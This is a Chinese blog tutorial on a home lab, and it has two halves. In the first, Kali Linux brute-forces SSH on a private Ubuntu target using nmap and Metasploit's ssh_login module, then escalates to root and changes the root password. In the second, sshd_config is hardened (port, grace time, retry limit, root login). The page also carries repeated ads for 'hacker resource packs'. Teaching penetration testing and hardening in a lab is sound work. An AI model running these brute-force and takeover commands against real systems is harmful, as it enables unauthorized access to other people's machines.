网络安全零基础入门必看:Kali Linux如何进行SSH渗透与防御(非常详细)

最新推荐文章于 2025-05-14 17:11:37 发布
最新推荐文章于 2025-05-14 17:11:37 发布
阅读量641 收藏 28
点赞数 8
文章标签: web安全 计算机 网络安全 黑客技术 SSH渗透 干货分享 Kali Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cxyxx12/article/details/146940523
版权

文章目录

一、实验

1.环境

(1)主机

表1 主机

系统版本IP备注
Kali Linux2022.4

192.168.204.154(动态)

Ubuntu8.04192.168.204.143Kali(2022.4)的目标主机

(2)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(3) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(4)查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a


ip addr

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

2.nmap扫描目标主机

(1)扫描⽬标主机所在⽹段所有存活的主机

 nmap -sP 192.168.204.0/24

(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本

22端口已开放

nmap -sV 192.168.204.143

3.Kali Linux 进行 SSH 渗透

(1)进入MSF 控制台

msfconsole

(2) 搜索 ssh_login脚本

search ssh_login

(3) 使⽤编号为 0 的脚本

use 0

(4) 设置⽬标主机

 set rhosts 192.168.204.143

(4)查看选项

show options

(5)设置用户名与密码本

 set username msfadmin


set pass_file zidian.txt

(6)运⾏脚本

run

(7)查看会话

sessions

(8)连接会话

sessions 1

查看用户身份

whoami

查看路径

pwd

提升权限

 sudo -i

再次查看用户身份

whoami

更改密码

password root

(9)MobaXterm远程连接

连接

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

3.Kali Linux 进行 SSH 防御

(1)SSH安全配置(端口)

vim /etc/ssh/sshd_config

修改端口

(2)重启

/etc/init.d/ssh  restart

(3)退出之前的MSF

(5)进入MSF 控制台

msfconsole

(6) 搜索 ssh_login脚本

search ssh_login

(6) 使⽤编号为 0 的脚本

use 0

(7) 设置⽬标主机

 set rhosts 192.168.204.143

(8)设置用户名与密码本

 set username msfadmin


set pass_file zidian.txt

(9)运⾏脚本

失败

run

(10)nmap扫描端口

ssh端口为12345

nmap -sV 192.168.204.143

(11)查看选项

show options

(12) 设置目标端口

set rport 12345

(13)运⾏脚本

run


我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

(14)SSH安全配置(端口)

vim /etc/ssh/sshd_config

修改登录验证时间

(15)重启

/etc/init.d/ssh  restart

(16)验证(等待1分钟)

(17)SSH安全配置(容错次数)

vim /etc/ssh/sshd_config

修改容错次数

(18)重启

/etc/init.d/ssh  restart

(19)容错2次

二、问题

1.SSH有哪些安全配置

(1)配置

Port 12345            //端口                                  
LoginGraceTime 1m     //登录验证耗时                               
PermitRootLogin no    //不允许root远程登录                              
MaxAuthTries 2        //最大容错次数2                                
AllowUsers msfadmin@192.168.204.100    //允许指定用户在指定IP上登录

2.MSF 退出报错

(1)报错

[*] You have active sessions open, to exit anyway type "exit -y"

(2)原因分析

有session会话正在运行。

(3)解决方法

exit -y

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
Kali Linux2020 渗透测试指南》配套技术精讲
Ms08067安全实验室
11-10 1394
Kali是世界渗透测试行业公认的优秀的网络安全审计工具集合,它可以通过对设备的探测来审计它的安全性,而且功能极为完备,几乎包含了目前所有的热门工具。Kali的强大功能是毋庸置疑的,它几乎...
Kali Linux 安全渗透技术教程
09-06
Kali Linux 安全渗透技术教程-----Kali Linux 安全渗透技术教程----2017年7月出的
Kali Linux安全渗透教程全
07-07
偶然看到Kali Linux上架win10商店了,所以特意传上来给一些初学者学的
Kali Linux 汉化 开启SSH
最新发布
yanglin666的博客
05-14 287
Kali Linux 汉化 开启SSH
KaliLinux安全渗透教程(完整版)
04-26
第 1 章 Lin u x 安 全 渗 透 简 介 1.1 什 么 是 安 全 渗 透 1.2 安 全 渗 透 所 需 的 工 具 1.3 K ali Lin u x 简 介 1.4 安 装 K ali Lin u x 1.5 K ali更 新 升 级 1.6 基 本 设 置 第 2 章 配 置 K ali Lin u x 2.1 准 备 内 核 头 文 件 2.2 安 装 并 配 置 N VIDIA 显 卡 驱 动 2.3 应 用 更 新 和 配 置 额 外 安 全 工 具 2.4 设 置 P r o x y C h ain s 2.5 目 录 加 密 第 3 章 高 级 测 试 实 验 室 3.1 使 用 V M w a r e W o r k s t a tio n 3.2 攻 击 W o r d P r e s s 和 其 他 应 用 程 序 第 4 章 信 息 收 集 4.1 枚 举 服 务 4.2 测 试 网 络 范 围 4.3 识 别 活 跃 的 主 机 4.4 查 看 打 开 的 端 口 4.5 系 统 指 纹 识 别 4.6 服 务 的 指 纹 识 别 4.7 其 他 信 息 收 集 手 段 4.8 使 用 M alt e g o 收 集 信 息 4.9 绘 制 网 络 结 构 图 第 5 章 漏 洞 扫 描 5.1 使 用 N e s s u s 5.2 使 用 O p e n VA S 第 6 章 漏 洞 利 用 6.1 M e t a s ploit a ble 操 作 系 统 6.2 M e t a s ploit 基 础 6.3 控 制 M e t e r p r e t e r 6.4 渗 透 攻 击 应 用 大 学 霸 K ali Lin u x 安 全 渗 透 教 程 2 6.5 7 7.1 7.2 7.3 7.4 8 8.1 8.2 8.3 8.4 8.5 8.6 8.7 8.8 8.9 9 9.1 9.2 9.3 9.4 9.5 9.6 9.7 9.8 6.5 免杀Payload生成工具Veil 第7章 权限提升 7.1 使用假冒令牌 7.2 本地权限提升 7.3 使用社会工程学工具包(SET) 7.4 使用SET实施攻击 第8章 密码攻击 8.1 密码在线破解 8.2 分析密码 8.3 破解LM Hashes密码 8.4 绕过Utilman登录 8.5 破解纯文本密码工具mimikatz 8.6 破解操作系统用户密码 8.7 创建密码字典 8.8 使用NVIDIA计算机统一设备架构(CUDA) 8.9 物理访问攻击 第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上破解无线网络 9.7 攻击路由器 9.8 Arpspoof工具
Kali Linux安全渗透教程(内部资料)
01-26
Kali Linux安全渗透教程(内部资料)
Kali Linux安全渗透教程新手版
12-06
Kali Linux安全渗透教程新手版,有利有新手的学习
Kali Linux在Android渗透测试中的应用】:权威指南揭秘从入门到高级的备技巧
Kali Linux在Android渗透测试中的基础知识 ## 1.1 Kali Linux简介 Kali Linux是一个基于Debian的Linux发行版,专为安全审计、渗透测试、计算机取证等信息安全领域设计。由于其预装了大量渗透测试工具和开源应用...
Kali Linux新手入门】:零基础打造黑客工具箱的10大秘诀
[【Kali Linux新手入门】:零基础打造黑客工具箱的10大秘诀](https://img-blog.csdnimg.cn/img_convert/1c94fc36f6831f91c07a5ba0d9645531.png) # 1. Kali Linux简介安装 ## 1.1 Kali Linux概述 Kali Linux是一...
linux ssh7.4 升级至9.5(安全扫描漏洞处理)
cc123489ll的博客
04-24 814
漏洞处理#$ ssh -V点击进行下载点击进行下载点击[telnet-server-0.17-66.el7.x86_64.rpm “telnet-server-0.17-66.el7.x86_64.rpm”)进行下载。
Kali Linux渗透测试技术详解_渗透测试入门
javagty6778的博客
03-12 1046
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟机,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。阅读永远是最有效的方法,尽管书籍并不一定是最好的入门方式,但书籍的理解需要一定的基础;
kali渗透测试生成Linux病毒入侵Ubuntu主机
chidaoqiannianzq的博客
10-17 1008
新版本 Metasploit 支持多项语言,框架建立在不断增长的世界级攻击性内容库的框架基础上,包括了可用性改进和大规模开发的支持,数据库和自动化 API 的改进等,帮助绕过安全检测机制。模块是 Metasploit Framework 中非常核心的组件,它为渗透测试人员提供了一个强大的工具,用于监听和处理由漏洞利用触发的连接请求,实现对目标系统的控制和进一步的渗透活动。能够处理多种类型的有效载荷,包括但不限于 Meterpreter、Shell 等,这使得它非常灵活,可以适应不同的渗透测试需求。
日常--Kali开启SSH详细教程)
热门推荐
懷淰メ的博客
07-30 4万+
本文介绍了Kali开启SSH详细操作步骤,用于日常的记录。httpshttpshttpshttpshttpshttps。
kali linux开启ssh服务 用xshell 登录kali 保姆级教学
章叁的博客
11-02 2558
首先咱们要看一下kali linux 的ip地址。接下来咱们用xshell 连接kalissh。接下来 咱们要用这个ip地址来连接xshell。输入你的kali linux 用户密码 点确定。这里显示kali linux 的ip地址。然后ESC :wq!让我们在真实机打开xshell。查看命令是 ifconfig。输入下面命令启动 SSH。然后 弹出 点击接受并保存。点击输入你的用户名 点确定。然后点击 左上角的新建。
网络安全Kali Linux 进行 SSH 渗透防御
cronaldo91的博客
03-06 2649
(3) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本。(1)扫描⽬标主机所在⽹段所有存活的主机。192.168.204.154(动态)(17)SSH安全配置(容错次数)( 14)SSH安全配置(端口)(1)SSH安全配置(端口)(5)进入MSF 控制台。(8)设置用户名密码本。(16)验证(等待1分钟)(1)进入MSF 控制台。(5)设置用户名密码本。(10)nmap扫描端口。
kali打开ssh服务
qq_44936245的博客
03-25 735
最近在学习网安在下了xshell8 想连一下kali,要先开启kalissh服务。
kali 配置sshd服务
没有故事
09-13 791
apt-install openssh-server ( 普通用户要加sudo : sudo apt-install xxx)服务还是没开,所以重启了一下ssh服务,再次查看发现端口已经好了。ssh 服务有问题,安装openssh-server。root用户下操作,如普通用户,需要加sudo。scp 失败,提示kali ssh端口有问题。安装完成后,查看ssh 服务是否正常了。打开kali,查看ssh 服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值